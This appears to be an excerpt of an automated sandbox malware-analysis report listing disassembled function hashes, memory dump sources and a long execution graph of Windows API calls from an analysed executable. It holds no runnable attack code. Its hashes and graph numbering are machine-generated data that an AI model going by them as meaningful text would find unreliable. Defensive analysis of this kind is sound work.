                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CommandHandleLineModule
                                                                                • String ID: U1hd.@$h'C
                                                                                • API String ID: 2123368496-2741041117
                                                                                • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: )q@
                                                                                • API String ID: 3660427363-2284170586
                                                                                • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 1458359878-0
                                                                                • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                Execution Graph

                                                                                Execution Coverage:16%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:4.3%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:69
                                                                                execution_graph 49694 40cf00 49695 40cf12 49694->49695 49696 40cf0d 49694->49696 49698 406f50 CloseHandle 49696->49698 49698->49695 55841 4413a4 55842 4413ad 55841->55842 55843 4413bb WriteFile 55841->55843 55842->55843 55844 4413c6 55843->55844 49699 492208 49700 49223c 49699->49700 49701 49223e 49700->49701 49702 492252 49700->49702 49845 446fac 18 API calls 49701->49845 49705 492261 49702->49705 49707 49228e 49702->49707 49704 492247 Sleep 49719 492289 49704->49719 49835 447008 49705->49835 49711 4922ca 49707->49711 49712 49229d 49707->49712 49709 492270 49713 492278 FindWindowA 49709->49713 49717 4922d9 49711->49717 49718 492320 49711->49718 49714 447008 18 API calls 49712->49714 49839 447288 49713->49839 49716 4922aa 49714->49716 49721 4922b2 FindWindowA 49716->49721 49846 446fac 18 API calls 49717->49846 49724 49237c 49718->49724 49725 49232f 49718->49725 49885 403420 49719->49885 49723 447288 5 API calls 49721->49723 49722 4922e5 49847 446fac 18 API calls 49722->49847 49727 4922c5 49723->49727 49734 4923d8 49724->49734 49735 49238b 49724->49735 49850 446fac 18 API calls 49725->49850 49727->49719 49729 4922f2 49848 446fac 18 API calls 49729->49848 49730 49233b 49851 446fac 18 API calls 49730->49851 49733 4922ff 49849 446fac 18 API calls 49733->49849 49745 492412 49734->49745 49746 4923e7 49734->49746 49855 446fac 18 API calls 49735->49855 49737 492348 49852 446fac 18 API calls 49737->49852 49739 492397 49856 446fac 18 API calls 49739->49856 49741 49230a SendMessageA 49744 447288 5 API calls 49741->49744 49743 492355 49853 446fac 18 API calls 49743->49853 49744->49727 49754 492421 49745->49754 49755 492460 49745->49755 49749 447008 18 API calls 49746->49749 49747 4923a4 49857 446fac 18 API calls 49747->49857 49752 4923f4 49749->49752 49751 492360 PostMessageA 49854 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49751->49854 49757 4923fc RegisterClipboardFormatA 49752->49757 49753 4923b1 49858 446fac 18 API calls 49753->49858 49860 446fac 18 API calls 49754->49860 49763 49246f 49755->49763 49764 4924b4 49755->49764 49760 447288 5 API calls 49757->49760 49760->49719 49761 4923bc SendNotifyMessageA 49859 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49761->49859 49762 49242d 49861 446fac 18 API calls 49762->49861 49863 446fac 18 API calls 49763->49863 49773 492508 49764->49773 49774 4924c3 49764->49774 49768 49243a 49862 446fac 18 API calls 49768->49862 49769 49247b 49864 446fac 18 API calls 49769->49864 49772 492445 SendMessageA 49777 447288 5 API calls 49772->49777 49782 49256a 49773->49782 49783 492517 49773->49783 49867 446fac 18 API calls 49774->49867 49776 492488 49865 446fac 18 API calls 49776->49865 49777->49727 49778 4924cf 49868 446fac 18 API calls 49778->49868 49781 492493 PostMessageA 49866 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49781->49866 49790 492579 49782->49790 49791 4925f1 49782->49791 49786 447008 18 API calls 49783->49786 49784 4924dc 49869 446fac 18 API calls 49784->49869 49788 492524 49786->49788 49871 42e3a4 SetErrorMode 49788->49871 49789 4924e7 SendNotifyMessageA 49870 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49789->49870 49794 447008 18 API calls 49790->49794 49800 492600 49791->49800 49801 492626 49791->49801 49798 492588 49794->49798 49795 492531 49796 492547 GetLastError 49795->49796 49797 492537 49795->49797 49802 447288 5 API calls 49796->49802 49799 447288 5 API calls 49797->49799 49874 446fac 18 API calls 49798->49874 49803 492545 49799->49803 49879 446fac 18 API calls 49800->49879 49810 492658 49801->49810 49811 492635 49801->49811 49802->49803 49807 447288 5 API calls 49803->49807 49806 49260a FreeLibrary 49880 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49806->49880 49807->49719 49808 49259b GetProcAddress 49812 4925e1 49808->49812 49813 4925a7 49808->49813 49818 492667 49810->49818 49824 49269b 49810->49824 49814 447008 18 API calls 49811->49814 49878 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49812->49878 49875 446fac 18 API calls 49813->49875 49816 492641 49814->49816 49822 492649 CreateMutexA 49816->49822 49881 48c638 18 API calls 49818->49881 49819 4925b3 49876 446fac 18 API calls 49819->49876 49822->49719 49823 4925c0 49827 447288 5 API calls 49823->49827 49824->49719 49883 48c638 18 API calls 49824->49883 49826 492673 49828 492684 OemToCharBuffA 49826->49828 49829 4925d1 49827->49829 49882 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49828->49882 49877 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49829->49877 49832 4926b6 49833 4926c7 CharToOemBuffA 49832->49833 49884 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49833->49884 49836 447010 49835->49836 49889 436088 49836->49889 49838 44702f 49838->49709 49840 447290 49839->49840 49943 4363f0 VariantClear 49840->49943 49842 4472b3 49843 4472ca 49842->49843 49944 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49842->49944 49843->49719 49845->49704 49846->49722 49847->49729 49848->49733 49849->49741 49850->49730 49851->49737 49852->49743 49853->49751 49854->49727 49855->49739 49856->49747 49857->49753 49858->49761 49859->49719 49860->49762 49861->49768 49862->49772 49863->49769 49864->49776 49865->49781 49866->49727 49867->49778 49868->49784 49869->49789 49870->49719 49945 403738 49871->49945 49874->49808 49875->49819 49876->49823 49877->49727 49878->49727 49879->49806 49880->49719 49881->49826 49882->49719 49883->49832 49884->49719 49887 403426 49885->49887 49886 40344b 49887->49886 49888 402660 4 API calls 49887->49888 49888->49887 49890 436094 49889->49890 49906 4360b6 49889->49906 49890->49906 49909 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49890->49909 49891 436139 49918 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49891->49918 49893 436121 49913 403494 49893->49913 49894 436109 49898 403510 4 API calls 49894->49898 49895 4360fd 49910 403510 49895->49910 49896 43612d 49917 4040e8 18 API calls 49896->49917 49903 436112 49898->49903 49902 43614a 49902->49838 49903->49838 49904 436115 49904->49838 49906->49891 49906->49893 49906->49894 49906->49895 49906->49896 49906->49904 49907 436136 49907->49838 49909->49906 49919 4034e0 49910->49919 49915 403498 49913->49915 49914 4034ba 49914->49838 49915->49914 49916 402660 4 API calls 49915->49916 49916->49914 49917->49907 49918->49902 49924 4034bc 49919->49924 49922 4034f0 49929 403400 49922->49929 49925 4034c0 49924->49925 49926 4034dc 49924->49926 49933 402648 49925->49933 49926->49922 49928 4034c9 49928->49922 49930 403406 49929->49930 49931 40341f 49929->49931 49930->49931 49938 402660 49930->49938 49931->49838 49934 40264c 49933->49934 49935 402656 49933->49935 49934->49935 49937 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49934->49937 49935->49928 49935->49935 49937->49935 49939 402664 49938->49939 49941 40266e 49938->49941 49939->49941 49942 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49939->49942 49941->49931 49942->49941 49943->49842 49944->49843 49946 40373c LoadLibraryA 49945->49946 49946->49795 49947 402584 49948 402598 49947->49948 49949 4025ab 49947->49949 49977 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49948->49977 49950 4025c2 RtlEnterCriticalSection 49949->49950 49951 4025cc 49949->49951 49950->49951 49963 4023b4 13 API calls 49951->49963 49953 40259d 49953->49949 49955 4025a1 49953->49955 49956 4025d9 49959 402635 49956->49959 49960 40262b RtlLeaveCriticalSection 49956->49960 49957 4025d5 49957->49956 49964 402088 49957->49964 49960->49959 49961 4025e5 49961->49956 49978 402210 9 API calls 49961->49978 49963->49957 49965 40209c 49964->49965 49966 4020af 49964->49966 49985 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49965->49985 49968 4020c6 RtlEnterCriticalSection 49966->49968 49971 4020d0 49966->49971 49968->49971 49969 4020a1 49969->49966 49970 4020a5 49969->49970 49974 402106 49970->49974 49971->49974 49979 401f94 49971->49979 49974->49961 49975 4021f1 RtlLeaveCriticalSection 49976 4021fb 49975->49976 49976->49961 49977->49953 49978->49956 49980 401fa4 49979->49980 49981 401fd0 49980->49981 49984 401ff4 49980->49984 49986 401f0c 49980->49986 49981->49984 49991 401db4 49981->49991 49984->49975 49984->49976 49985->49969 49995 40178c 49986->49995 49989 401f29 49989->49980 49992 401dd2 49991->49992 49993 401e02 49991->49993 49992->49984 49993->49992 50018 401d1c 49993->50018 49998 4017a8 49995->49998 49997 4017b2 50014 401678 VirtualAlloc 49997->50014 49998->49997 50000 40180f 49998->50000 50002 401803 49998->50002 50006 4014e4 49998->50006 50015 4013e0 LocalAlloc 49998->50015 50000->49989 50005 401e80 9 API calls 50000->50005 50016 4015c0 VirtualFree 50002->50016 50003 4017be 50003->50000 50005->49989 50007 4014f3 VirtualAlloc 50006->50007 50009 401520 50007->50009 50010 401543 50007->50010 50017 401398 LocalAlloc 50009->50017 50010->49998 50012 40152c 50012->50010 50013 401530 VirtualFree 50012->50013 50013->50010 50014->50003 50015->49998 50016->50000 50017->50012 50019 401d2e 50018->50019 50020 401d51 50019->50020 50021 401d63 50019->50021 50031 401940 50020->50031 50023 401940 3 API calls 50021->50023 50024 401d61 50023->50024 50025 401d79 50024->50025 50041 401bf8 9 API calls 50024->50041 50025->49992 50027 401d88 50028 401da2 50027->50028 50042 401c4c 9 API calls 50027->50042 50043 401454 LocalAlloc 50028->50043 50032 401966 50031->50032 50040 4019bf 50031->50040 50044 40170c 50032->50044 50036 401983 50038 40199a 50036->50038 50049 4015c0 VirtualFree 50036->50049 50038->50040 50050 401454 LocalAlloc 50038->50050 50040->50024 50041->50027 50042->50028 50043->50025 50045 401743 50044->50045 50046 401783 50045->50046 50047 40175d VirtualFree 50045->50047 50048 4013e0 LocalAlloc 50046->50048 50047->50045 50048->50036 50049->50038 50050->50040 55845 48042c 55850 450ff0 55845->55850 55847 480440 55860 47f518 55847->55860 55849 480464 55851 450ffd 55850->55851 55853 451051 55851->55853 55866 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55851->55866 55854 450e74 InterlockedExchange 55853->55854 55855 451063 55854->55855 55857 451079 55855->55857 55867 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55855->55867 55858 4510bc 55857->55858 55868 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55857->55868 55858->55847 55869 40b5c8 55860->55869 55862 47f53a 55863 47f585 55862->55863 55864 4069e4 4 API calls 55862->55864 55873 4768b0 55862->55873 55863->55849 55864->55862 55866->55853 55867->55857 55868->55858 55871 40b5d3 55869->55871 55870 40b5f3 55870->55862 55871->55870 55889 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55871->55889 55881 4768e1 55873->55881 55883 47692a 55873->55883 55874 476975 55890 451280 55874->55890 55876 451280 21 API calls 55876->55883 55877 4038a4 4 API calls 55877->55881 55878 47698c 55879 403420 4 API calls 55878->55879 55882 4769a6 55879->55882 55880 4038a4 4 API calls 55880->55883 55881->55877 55881->55883 55884 403744 4 API calls 55881->55884 55885 403450 4 API calls 55881->55885 55888 451280 21 API calls 55881->55888 55882->55862 55883->55874 55883->55876 55883->55880 55886 403744 4 API calls 55883->55886 55887 403450 4 API calls 55883->55887 55884->55881 55885->55881 55886->55883 55887->55883 55888->55881 55889->55870 55891 45129b 55890->55891 55895 451290 55890->55895 55896 451224 21 API calls 55891->55896 55893 4512a6 55893->55895 55897 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55893->55897 55895->55878 55896->55893 55897->55895 55898 41ee64 55899 41ee73 IsWindowVisible 55898->55899 55900 41eea9 55898->55900 55899->55900 55901 41ee7d IsWindowEnabled 55899->55901 55901->55900 55902 41ee87 55901->55902 55903 402648 4 API calls 55902->55903 55904 41ee91 EnableWindow 55903->55904 55904->55900 55905 41fb68 55906 41fb71 55905->55906 55909 41fe0c 55906->55909 55908 41fb7e 55910 41fefe 55909->55910 55911 41fe23 55909->55911 55910->55908 55911->55910 55930 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55911->55930 55913 41fe59 55914 41fe83 55913->55914 55915 41fe5d 55913->55915 55940 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55914->55940 55931 41fbac 55915->55931 55918 41fe91 55920 41fe95 55918->55920 55921 41febb 55918->55921 55924 41fbac 10 API calls 55920->55924 55925 41fbac 10 API calls 55921->55925 55922 41fbac 10 API calls 55923 41fe81 55922->55923 55923->55908 55926 41fea7 55924->55926 55927 41fecd 55925->55927 55928 41fbac 10 API calls 55926->55928 55929 41fbac 10 API calls 55927->55929 55928->55923 55929->55923 55930->55913 55932 41fbc7 55931->55932 55933 41fbdd 55932->55933 55934 41f94c 4 API calls 55932->55934 55941 41f94c 55933->55941 55934->55933 55936 41fc25 55937 41fc48 SetScrollInfo 55936->55937 55949 41faac 55937->55949 55940->55918 55942 4181f0 55941->55942 55943 41f969 GetWindowLongA 55942->55943 55944 41f9a6 55943->55944 55945 41f986 55943->55945 55961 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55944->55961 55960 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55945->55960 55948 41f992 55948->55936 55950 41faba 55949->55950 55951 41fac2 55949->55951 55950->55922 55952 41fb01 55951->55952 55953 41faf1 55951->55953 55959 41faff 55951->55959 55963 417e58 IsWindowVisible ScrollWindow SetWindowPos 55952->55963 55962 417e58 IsWindowVisible ScrollWindow SetWindowPos 55953->55962 55954 41fb41 GetScrollPos 55954->55950 55957 41fb4c 55954->55957 55958 41fb5b SetScrollPos 55957->55958 55958->55950 55959->55954 55960->55948 55961->55948 55962->55959 55963->55959 55964 4205a8 55965 4205bb 55964->55965 55985 415b40 55965->55985 55967 420702 55968 420719 55967->55968 55992 4146e4 KiUserCallbackDispatcher 55967->55992 55972 420730 55968->55972 55993 414728 KiUserCallbackDispatcher 55968->55993 55969 420661 55990 420858 20 API calls 55969->55990 55970 4205f6 55970->55967 55970->55969 55978 420652 MulDiv 55970->55978 55975 420752 55972->55975 55994 420070 12 API calls 55972->55994 55976 42067a 55976->55967 55991 420070 12 API calls 55976->55991 55989 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 55978->55989 55981 420697 55982 4206b3 MulDiv 55981->55982 55983 4206d6 55981->55983 55982->55983 55983->55967 55984 4206df MulDiv 55983->55984 55984->55967 55986 415b52 55985->55986 55995 414480 55986->55995 55988 415b6a 55988->55970 55989->55969 55990->55976 55991->55981 55992->55968 55993->55972 55994->55975 55996 41449a 55995->55996 55999 410658 55996->55999 55998 4144b0 55998->55988 56002 40dea4 55999->56002 56001 41065e 56001->55998 56003 40df06 56002->56003 56004 40deb7 56002->56004 56009 40df14 56003->56009 56007 40df14 19 API calls 56004->56007 56008 40dee1 56007->56008 56008->56001 56010 40df24 56009->56010 56012 40df3a 56010->56012 56021 40e29c 56010->56021 56037 40d7e0 56010->56037 56040 40e14c 56012->56040 56015 40d7e0 5 API calls 56016 40df42 56015->56016 56016->56015 56017 40dfae 56016->56017 56043 40dd60 56016->56043 56018 40e14c 5 API calls 56017->56018 56020 40df10 56018->56020 56020->56001 56057 40eb6c 56021->56057 56023 403778 4 API calls 56025 40e2d7 56023->56025 56024 40e38d 56026 40e3b7 56024->56026 56027 40e3a8 56024->56027 56025->56023 56025->56024 56120 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56025->56120 56121 40e280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56025->56121 56117 40bc24 56026->56117 56066 40e5c0 56027->56066 56032 40e3b5 56034 403400 4 API calls 56032->56034 56035 40e45c 56034->56035 56035->56010 56038 40ec08 5 API calls 56037->56038 56039 40d7ea 56038->56039 56039->56010 56154 40d6bc 56040->56154 56163 40e154 56043->56163 56046 40eb6c 5 API calls 56047 40dd9e 56046->56047 56048 40eb6c 5 API calls 56047->56048 56049 40dda9 56048->56049 56050 40ddc4 56049->56050 56051 40ddbb 56049->56051 56056 40ddc1 56049->56056 56170 40dbd8 56050->56170 56173 40dcc8 19 API calls 56051->56173 56054 403420 4 API calls 56055 40de8f 56054->56055 56055->56016 56056->56054 56123 40d980 56057->56123 56060 4034e0 4 API calls 56061 40eb8f 56060->56061 56062 403744 4 API calls 56061->56062 56063 40eb96 56062->56063 56064 40d980 5 API calls 56063->56064 56065 40eba4 56064->56065 56065->56025 56067 40e5f6 56066->56067 56068 40e5ec 56066->56068 56070 40e711 56067->56070 56071 40e695 56067->56071 56072 40e6f6 56067->56072 56073 40e776 56067->56073 56074 40e638 56067->56074 56075 40e6d9 56067->56075 56076 40e67a 56067->56076 56077 40e6bb 56067->56077 56110 40e65c 56067->56110 56128 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56068->56128 56078 40d964 5 API calls 56070->56078 56136 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56071->56136 56141 40ea90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56072->56141 56082 40d964 5 API calls 56073->56082 56129 40d964 56074->56129 56139 40eba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56075->56139 56135 40da18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56076->56135 56138 40dfe4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56077->56138 56087 40e719 56078->56087 56081 403400 4 API calls 56088 40e7eb 56081->56088 56089 40e77e 56082->56089 56093 40e723 56087->56093 56094 40e71d 56087->56094 56088->56032 56095 40e782 56089->56095 56096 40e79b 56089->56096 56090 40e6e4 56140 409f38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56090->56140 56092 40e6a0 56137 40d670 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56092->56137 56142 40ec08 56093->56142 56102 40e721 56094->56102 56103 40e73c 56094->56103 56105 40ec08 5 API calls 56095->56105 56148 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56096->56148 56098 40e661 56134 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56098->56134 56099 40e644 56132 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56099->56132 56146 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56102->56146 56108 40ec08 5 API calls 56103->56108 56105->56110 56112 40e744 56108->56112 56109 40e64f 56133 40e46c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56109->56133 56110->56081 56145 40daa0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56112->56145 56114 40e766 56147 40e4d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56114->56147 56149 40bbd0 56117->56149 56120->56025 56121->56025 56122 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56122->56032 56124 40d98b 56123->56124 56125 40d9c5 56124->56125 56127 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56124->56127 56125->56060 56127->56124 56128->56067 56130 40ec08 5 API calls 56129->56130 56131 40d96e 56130->56131 56131->56098 56131->56099 56132->56109 56133->56110 56134->56110 56135->56110 56136->56092 56137->56110 56138->56110 56139->56090 56140->56110 56141->56110 56143 40d980 5 API calls 56142->56143 56144 40ec15 56143->56144 56144->56110 56145->56110 56146->56114 56147->56110 56148->56110 56150 40bbe2 56149->56150 56152 40bc07 56149->56152 56150->56152 56153 40bc84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56150->56153 56152->56032 56152->56122 56153->56152 56155 40ec08 5 API calls 56154->56155 56156 40d6c9 56155->56156 56157 40d6dc 56156->56157 56161 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56156->56161 56157->56016 56159 40d6d7 56162 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56159->56162 56161->56159 56162->56157 56164 40d964 5 API calls 56163->56164 56165 40e16b 56164->56165 56166 40ec08 5 API calls 56165->56166 56169 40dd93 56165->56169 56167 40e178 56166->56167 56167->56169 56174 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56167->56174 56169->56046 56175 40ad7c 19 API calls 56170->56175 56172 40dc00 56172->56056 56173->56056 56174->56169 56175->56172 50051 491444 50052 49147e 50051->50052 50053 49148a 50052->50053 50054 491480 50052->50054 50056 491499 50053->50056 50057 4914c2 50053->50057 50247 4090a0 MessageBeep 50054->50247 50059 447008 18 API calls 50056->50059 50062 4914fa 50057->50062 50063 4914d1 50057->50063 50058 403420 4 API calls 50060 491ad6 50058->50060 50061 4914a6 50059->50061 50064 403400 4 API calls 50060->50064 50248 406bb8 50061->50248 50072 491509 50062->50072 50073 491532 50062->50073 50066 447008 18 API calls 50063->50066 50067 491ade 50064->50067 50069 4914de 50066->50069 50256 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50069->50256 50075 447008 18 API calls 50072->50075 50078 49155a 50073->50078 50079 491541 50073->50079 50074 4914e9 50257 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50074->50257 50077 491516 50075->50077 50258 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50077->50258 50086 491569 50078->50086 50087 49158e 50078->50087 50260 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 50079->50260 50082 491521 50259 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50082->50259 50083 491549 50261 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50083->50261 50088 447008 18 API calls 50086->50088 50090 49159d 50087->50090 50094 4915c6 50087->50094 50089 491576 50088->50089 50262 4072b0 50089->50262 50093 447008 18 API calls 50090->50093 50092 49157e 50265 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50092->50265 50096 4915aa 50093->50096 50097 4915fe 50094->50097 50098 4915d5 50094->50098 50266 42c814 50096->50266 50106 49164a 50097->50106 50107 49160d 50097->50107 50101 447008 18 API calls 50098->50101 50099 491485 50099->50058 50103 4915e2 50101->50103 50276 407200 8 API calls 50103->50276 50112 491659 50106->50112 50113 491682 50106->50113 50109 447008 18 API calls 50107->50109 50108 4915ed 50277 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50108->50277 50111 49161c 50109->50111 50114 447008 18 API calls 50111->50114 50115 447008 18 API calls 50112->50115 50119 4916ba 50113->50119 50120 491691 50113->50120 50116 49162d 50114->50116 50117 491666 50115->50117 50278 491148 8 API calls 50116->50278 50280 42c8b4 50117->50280 50129 4916c9 50119->50129 50130 4916f2 50119->50130 50123 447008 18 API calls 50120->50123 50121 491639 50279 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50121->50279 50126 49169e 50123->50126 50286 42c8dc 50126->50286 50132 447008 18 API calls 50129->50132 50135 49172a 50130->50135 50136 491701 50130->50136 50134 4916d6 50132->50134 50295 42c90c LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50134->50295 50143 491739 50135->50143 50144 491762 50135->50144 50138 447008 18 API calls 50136->50138 50140 49170e 50138->50140 50139 4916e1 50296 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50139->50296 50297 42c93c 50140->50297 50146 447008 18 API calls 50143->50146 50150 4917ae 50144->50150 50151 491771 50144->50151 50147 491746 50146->50147 50303 42c964 50147->50303 50156 4917bd 50150->50156 50157 491800 50150->50157 50153 447008 18 API calls 50151->50153 50155 491780 50153->50155 50158 447008 18 API calls 50155->50158 50159 447008 18 API calls 50156->50159 50163 49180f 50157->50163 50164 491873 50157->50164 50160 491791 50158->50160 50161 4917d0 50159->50161 50309 42c508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50160->50309 50165 447008 18 API calls 50161->50165 50167 447008 18 API calls 50163->50167 50172 4918b2 50164->50172 50173 491882 50164->50173 50168 4917e1 50165->50168 50166 49179d 50310 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50166->50310 50170 49181c 50167->50170 50311 491340 12 API calls 50168->50311 50239 42c618 7 API calls 50170->50239 50184 4918f1 50172->50184 50185 4918c1 50172->50185 50176 447008 18 API calls 50173->50176 50175 4917ef 50312 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50175->50312 50179 49188f 50176->50179 50177 49182a 50180 49182e 50177->50180 50181 491863 50177->50181 50315 4528f4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 50179->50315 50183 447008 18 API calls 50180->50183 50314 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50181->50314 50188 49183d 50183->50188 50193 491930 50184->50193 50194 491900 50184->50194 50189 447008 18 API calls 50185->50189 